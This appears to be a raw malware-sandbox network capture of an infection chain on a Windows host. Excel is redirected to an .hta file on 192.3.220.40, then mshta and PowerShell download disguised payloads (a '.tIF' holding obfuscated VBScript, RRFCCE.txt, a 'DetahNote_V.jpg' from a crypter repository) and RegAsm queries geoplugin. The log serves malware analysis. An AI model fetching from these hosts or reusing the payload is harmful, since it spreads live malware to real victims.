                                                                                                                                                                              Oct 14, 2024 11:05:44.116242886 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                              Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 192.3.220.40 | 80 | 3456 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:05:45.838871956 CEST | 443 | OUT | GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8896-
Connection: Keep-Alive
Host: 192.3.220.40
If-Range: "28fda-62468ee52a080"
Oct 14, 2024 11:05:46.327862978 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Mon, 14 Oct 2024 09:05:46 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 14 Oct 2024 05:15:53 GMT
ETag: "28fda-62468ee52a080"
Accept-Ranges: bytes
Content-Length: 159002
Content-Range: bytes 8896-167897/167898
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 192.3.220.40 | 80 | 3556 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:05:54.997355938 CEST | 359 | OUT | GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.220.40
Connection: Keep-Alive
Oct 14, 2024 11:05:55.479284048 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 09:05:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 14 Oct 2024 05:12:43 GMT
ETag: "2fcf0-62468e2fb0efb"
Accept-Ranges: bytes
Content-Length: 195824
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
                                                                                                                                                                              Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 61 00 6c 00 6d 00 65 00 63 00 65 00 67 00 75 00 65 00 69 00 72 00 61 00 28 00 66 00 6c 00 75 00 63 00 74 00 75 00 61 00 64 00 6f 00 72 00 2c 00 20 00 64 00 65 00 73 00 76 00 61 00 72 00 69 00 61 00 72 00 2c 00 20 00 6d 00 69 00 6c 00 69 00 63 00 69 00 61 00 6e 00 6f 00 2c 00 20 00 6d 00 6f 00 61 00 6e 00 73 00 61 00 2c 00 20 00 68 00 65 00 6d 00 69 00 61 00 74 00 72 00 6f 00 70 00 68 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 [TRUNCATED]
                                                                                                                                                                              Data Ascii: private function almecegueira(fluctuador, desvariar, miliciano, moansa, hemiatrophia) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if miliciano.ArgumentExists(NPARA_FILTER) then filter = miliciano.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if miliciano.ArgumentExists(NPARA_DIALECT) then dialect = miliciano.Argument(NPAR
Oct 14, 2024 11:05:55.479309082 CEST | 1236 | IN | Data Ascii: A_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbem/ws
Oct 14, 2024 11:05:55.479330063 CEST | 1236 | IN | Data Ascii: filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next fil
Oct 14, 2024 11:05:55.479341984 CEST | 1236 | IN | Data Ascii: L false, "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (miliciano.Argum
Oct 14, 2024 11:05:55.479356050 CEST | 1236 | IN | Data Ascii: if miliciano.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(miliciano.Argument(NPARA_RETURN_TYPE))
Oct 14, 2024 11:05:55.479439974 CEST | 1236 | IN | Data Ascii: (NPARA_SHALLOW)) then flags = flags OR fluctuador.EnumerationFlagHierarchyShallow elseif (miliciano.Argumen
Oct 14, 2024 11:05:55.479453087 CEST | 776 | IN | Data Ascii: ter, dialect, flags) end if end if ASSERTERR desvariar, hemiatrophia on error goto 0 i
Oct 14, 2024 11:05:55.479464054 CEST | 1236 | IN | Data Ascii: ults"">" end if do while Not e.AtEndOfStream on error resume next res = e.ReadItem()
Oct 14, 2024 11:05:55.479475975 CEST | 1236 | IN | Data Ascii: xt,hemiatrophia) then exit do end if wscript.echo formattedText loop
Oct 14, 2024 11:05:55.479487896 CEST | 1236 | IN | Data Ascii: = "cBONbWcrPhKWkbN"WlRihfpiideheZk = "RtiPBpkUpLfiAhC"GkGNoichZpomGhi = "GlfOeNnALjeCLaU"lPLfimsZhWfKZeK = "LKaux
Oct 14, 2024 11:05:55.484317064 CEST | 1236 | IN | Data Ascii: BrKzUKHpLKOtLH = "pGpPLZexLpSctLo"kikzqoNxuLnWQcd = "eALPZWhoPGLKWLh"ckRWuKiZfzBiBRR = "kiceCLPAULWxatacadistaW"ULk


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49171 | 192.3.220.40 | 80 | 2764 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:06:05.920476913 CEST | 478 | OUT | GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
If-Modified-Since: Mon, 14 Oct 2024 05:15:53 GMT
Connection: Keep-Alive
Host: 192.3.220.40
If-None-Match: "28fda-62468ee52a080"
Oct 14, 2024 11:06:06.411955118 CEST | 275 | IN | HTTP/1.1 304 Not Modified
Date: Mon, 14 Oct 2024 09:06:06 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 14 Oct 2024 05:15:53 GMT
ETag: "28fda-62468ee52a080"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49172 | 192.3.220.40 | 80 | 3996 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:06:08.902717113 CEST | 76 | OUT | GET /450/RRFCCE.txt HTTP/1.1
Host: 192.3.220.40
Connection: Keep-Alive
Oct 14, 2024 11:06:09.398521900 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 09:06:09 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 14 Oct 2024 05:09:54 GMT
ETag: "a1000-62468d8e12667"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | 1884 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:06:14.087153912 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 14, 2024 11:06:14.701910019 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Mon, 14 Oct 2024 09:06:14 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 192.3.220.40 | 80 | 3732 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:06:24.824851036 CEST | 76 | OUT | GET /450/RRFCCE.txt HTTP/1.1
Host: 192.3.220.40
Connection: Keep-Alive
Oct 14, 2024 11:06:25.330331087 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 14 Oct 2024 09:06:25 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 14 Oct 2024 05:09:54 GMT
ETag: "a1000-62468d8e12667"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 150.136.81.248 | 443 | 3184 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-14 09:05:43 UTC | 422 | OUT | GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: jfm.com.co
Connection: Keep-Alive
2024-10-14 09:05:43 UTC | 451 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Mon, 14 Oct 2024 09:05:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 89
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
Vary: Accept
2024-10-14 09:05:43 UTC | 89 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 150.136.81.248 | 443 | 3456 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-14 09:05:45 UTC | 446 | OUT | GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: jfm.com.co
Connection: Keep-Alive
2024-10-14 09:05:45 UTC | 451 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Mon, 14 Oct 2024 09:05:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 89
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
Vary: Accept
2024-10-14 09:05:45 UTC | 89 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49166 | 150.136.81.248 | 443 | 3184 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-14 09:06:03 UTC | 422 | OUT | GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: jfm.com.co
Connection: Keep-Alive
2024-10-14 09:06:03 UTC | 451 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Mon, 14 Oct 2024 09:06:03 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 89
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
Vary: Accept
2024-10-14 09:06:03 UTC | 89 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49167 | 185.199.108.133 | 443 | 3996 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-14 09:06:03 UTC | 134 | OUT | GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-14 09:06:03 UTC | 903 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 6331693
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 0C07:2DA33E:146EACB:16903B7:670CD329
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:03 GMT
                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                              X-Served-By: cache-nyc-kteb1890060-NYC
                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                              X-Timer: S1728896764.822353,VS0,VE47
                                                                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                              X-Fastly-Request-ID: 113a39df19d55a8d93304a65939dc97222b544fb
                                                                                                                                                                              Expires: Mon, 14 Oct 2024 09:11:03 GMT
                                                                                                                                                                              Source-Age: 0


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              4192.168.2.2249170150.136.81.2484432764C:\Windows\System32\mshta.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-10-14 09:06:05 UTC | 446 | OUT | GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: jfm.com.co
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:06:05 UTC | 451 | IN | HTTP/1.1 302 Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:05 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 89
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
                                                                                                                                                                              Vary: Accept
                                                                                                                                                                              2024-10-14 09:06:05 UTC | 89 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
                                                                                                                                                                              Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              5 | 192.168.2.22 | 49176 | 185.199.108.133 | 443 | 3732 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-10-14 09:06:19 UTC | 134 | OUT | GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:06:20 UTC | 903 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 6331693
                                                                                                                                                                              Cache-Control: max-age=300
                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              X-GitHub-Request-Id: 0C07:2DA33E:146EACB:16903B7:670CD329
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:20 GMT
                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                              X-Served-By: cache-nyc-kteb1890038-NYC
                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                              X-Timer: S1728896780.035999,VS0,VE1
                                                                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                              X-Fastly-Request-ID: 62966c03b82212111a6ef6004252838a221785cc
                                                                                                                                                                              Expires: Mon, 14 Oct 2024 09:11:20 GMT
                                                                                                                                                                              Source-Age: 16
                                                                                                                                                                              Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                                                                              Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                                                                              Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                                                              Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                                                              Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
